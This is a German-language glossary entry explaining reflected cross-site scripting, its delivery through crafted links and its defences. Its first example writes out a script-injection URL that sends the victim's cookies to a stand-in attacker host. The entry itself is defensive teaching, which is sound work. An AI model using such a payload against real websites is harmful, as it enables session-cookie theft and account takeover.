Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 912

Reflected XSS

Was ist Reflected XSS?

Reflected XSSNicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden.


Reflected XSS (auch nicht-persistent oder Typ-1) tritt auf, wenn eine Webanwendung Daten aus einer HTTP-Anfrage — meist Query-Parameter oder Formularfelder — ohne saubere Ausgabecodierung in die Antwort zurückschreibt. Da das Opfer einen präparierten Link anklicken muss, erfolgt die Auslieferung typischerweise über Phishing, Malvertising oder Messenger. Erfolgreiche Ausnutzung erlaubt das Stehlen von Session-Cookies, das Ausführen von Aktionen im Namen des Nutzers oder die Eskalation zur vollständigen Kontoübernahme. Schutz bieten kontextabhängiges HTML-Encoding, eine strikte Content Security Policy und Frameworks mit automatischer Template-Escaping.

Beispiele

  1. 01

    https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>

  2. 02

    Fehlerseite, die einen ungefilterten 'message'-Parameter direkt ins DOM einfügt.

Häufige Fragen

Was ist Reflected XSS?

Nicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.

Was bedeutet Reflected XSS?

Nicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden.

Wie funktioniert Reflected XSS?

Reflected XSS (auch nicht-persistent oder Typ-1) tritt auf, wenn eine Webanwendung Daten aus einer HTTP-Anfrage — meist Query-Parameter oder Formularfelder — ohne saubere Ausgabecodierung in die Antwort zurückschreibt. Da das Opfer einen präparierten Link anklicken muss, erfolgt die Auslieferung typischerweise über Phishing, Malvertising oder Messenger. Erfolgreiche Ausnutzung erlaubt das Stehlen von Session-Cookies, das Ausführen von Aktionen im Namen des Nutzers oder die Eskalation zur vollständigen Kontoübernahme. Schutz bieten kontextabhängiges HTML-Encoding, eine strikte Content Security Policy und Frameworks mit automatischer Template-Escaping.

Wie schützt man sich gegen Reflected XSS?

Schutzmaßnahmen gegen Reflected XSS kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.

Welche anderen Bezeichnungen gibt es für Reflected XSS?

Übliche alternative Bezeichnungen: Nicht-persistentes XSS, Typ-1-XSS.

Verwandte Begriffe

Siehe auch